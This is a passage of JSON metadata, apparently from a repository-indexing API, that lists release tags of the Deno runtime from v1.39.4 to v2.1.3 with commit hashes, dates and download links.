5T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https:/